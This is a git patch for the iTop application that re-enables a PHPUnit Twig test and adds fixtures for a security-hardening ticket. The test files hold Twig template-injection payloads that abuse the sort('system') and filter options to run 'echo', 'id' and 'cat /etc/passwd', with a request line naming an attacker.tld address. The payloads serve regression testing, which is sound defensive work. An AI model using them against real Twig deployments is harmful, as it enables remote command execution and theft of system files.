From 37fc1a572380f2faa67fddea5b1a3a4ba72ed54e Mon Sep 17 00:00:00 2001
From: Eric Espie <eric.espie@combodo.com>
Date: Thu, 19 Dec 2024 15:12:26 +0100
Subject: [PATCH] =?UTF-8?q?N=C2=B07810=20-=20security=20hardening?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 tests/php-unit-tests/phpunit.xml.dist         |  4 +-
 .../application/TwigBase/Twig/TwigTest.php    | 80 ++++++++-----------
 .../application/TwigBase/Twig/test.html       |  3 +
 .../application/TwigBase/Twig/test.html.twig  |  3 +
 4 files changed, 42 insertions(+), 48 deletions(-)

diff --git a/tests/php-unit-tests/phpunit.xml.dist b/tests/php-unit-tests/phpunit.xml.dist
index fed259d40..94bfcbf08 100644
--- a/tests/php-unit-tests/phpunit.xml.dist
+++ b/tests/php-unit-tests/phpunit.xml.dist
@@ -41,7 +41,9 @@
     <testsuite name="Setup">
       <directory>unitary-tests/setup</directory>
     </testsuite>
-    <!-- Note: The unitary-tests/sources/application/TwigBase is omitted for now as the test is not working -->
+    <testsuite name="SourcesApplicationTwigBase">
+      <directory>unitary-tests/sources/application/TwigBase</directory>
+    </testsuite>
     <testsuite name="SourcesApplicationSearch">
       <directory>unitary-tests/sources/application/search</directory>
     </testsuite>
diff --git a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/TwigTest.php b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/TwigTest.php
index c01ad8606..83df359d2 100644
--- a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/TwigTest.php
+++ b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/TwigTest.php
@@ -1,58 +1,44 @@
 <?php
-namespace Combodo\iTop\Test\UnitTest;
+
+namespace Combodo\iTop\Test\UnitTest\Application\TwigBase;
 
 use Combodo\iTop\Portal\Twig\AppExtension;
-use Twig_Environment;
-use Twig_Loader_Array;
+use Combodo\iTop\Test\UnitTest\ItopDataTestCase;
+use Twig\Environment;
+use Twig\Loader\FilesystemLoader;
 
-/**
- * @runTestsInSeparateProcesses
- * @preserveGlobalState disabled
- * @backupGlobals disabled
- */
 class TwigTest extends ItopDataTestCase
 {
-	protected function setUp(): void
-	{
-		parent::setUp();
-		$this->RequireOnceItopFile('core/config.class.inc.php');
-	}
+    protected function setUp(): void
+    {
+        parent::setUp();
+        $this->RequireOnceItopFile('core/config.class.inc.php');
+    }
 
-	/**
-	 * Test the fix for ticket N°4384
-	 *
-	 * @dataProvider TemplateProvider
-	 *
-	 */
-	public function testTemplate($sFileName, $sExpected)
-	{
-		$sId = 'TestTwig';
-		$oAppExtension = new AppExtension();
+    /**
+     * @covers N°4384 N°7810
+     *
+     */
+    public function testTemplate()
+    {
+        // Creating sandbox twig env. to load and test the custom form template
+        $oTwig = new Environment(new FilesystemLoader(__DIR__.'/'));
 
-		// Creating sandbox twig env. to load and test the custom form template
-		$oTwig = new Twig_Environment(new Twig_Loader_Array([$sId => $sFileName]));
+        // Manually registering filters and functions as we didn't find how to do it automatically
+        $oAppExtension = new AppExtension();
+        $aFilters = $oAppExtension->getFilters();
+        foreach ($aFilters as $oFilter)
+        {
+            $oTwig->addFilter($oFilter);
+        }
+        $aFunctions = $oAppExtension->getFunctions();
+        foreach ($aFunctions as $oFunction)
+        {
+            $oTwig->addFunction($oFunction);
+        }
 
-		// Manually registering filters and functions as we didn't find how to do it automatically
-		$aFilters = $oAppExtension->getFilters();
-		foreach ($aFilters as $oFilter)
-		{
-			$oTwig->addFilter($oFilter);
-		}
-		$aFunctions = $oAppExtension->getFunctions();
-		foreach ($aFunctions as $oFunction)
-		{
-			$oTwig->addFunction($oFunction);
-		}
-	}
+        $sOutput = $oTwig->render('test.html.twig');
 
-	public static function testTemplateProvider()
-	{
-		$aReturn = array();
-		$aReturn['filter_system'] = [
-				'sFileName' => 'test.html',
-				'expected' =>file_get_contents(dirname(__FILE__).'/test.html'),
-			];
-
-		return $aReturn;
-	}
+        $this->assertEquals(file_get_contents(__DIR__.'/test.html'), $sOutput);
+    }
 }
\ No newline at end of file
diff --git a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html
index 15039796e..105c5a974 100644
--- a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html
+++ b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html
@@ -42,5 +42,8 @@ Smith, Dupond
 <div>['echo',1]|sort('system')|join</div>
 echo1
 
+<div>[['id','']|sort('system')</div>
+id
+
 POST /subscribe?0=cat+/etc/passwd HTTP/1.1
 email=""@attacker.tld
\ No newline at end of file
diff --git a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html.twig b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html.twig
index 1232f8104..1b7eb63b9 100644
--- a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html.twig
+++ b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html.twig
@@ -47,5 +47,8 @@
 <div>['echo',1]|sort('system')|join</div>
 {{ ['echo',1]|sort('system')|join }}
 
+<div>[['id','']|sort('system')</div>
+{{['id','']|sort('system')|join}}
+
 POST /subscribe?0=cat+/etc/passwd HTTP/1.1
 email="{{ app.request.query.filter(0,0,1024,{'options':'system'}) }}"@attacker.tld
\ No newline at end of file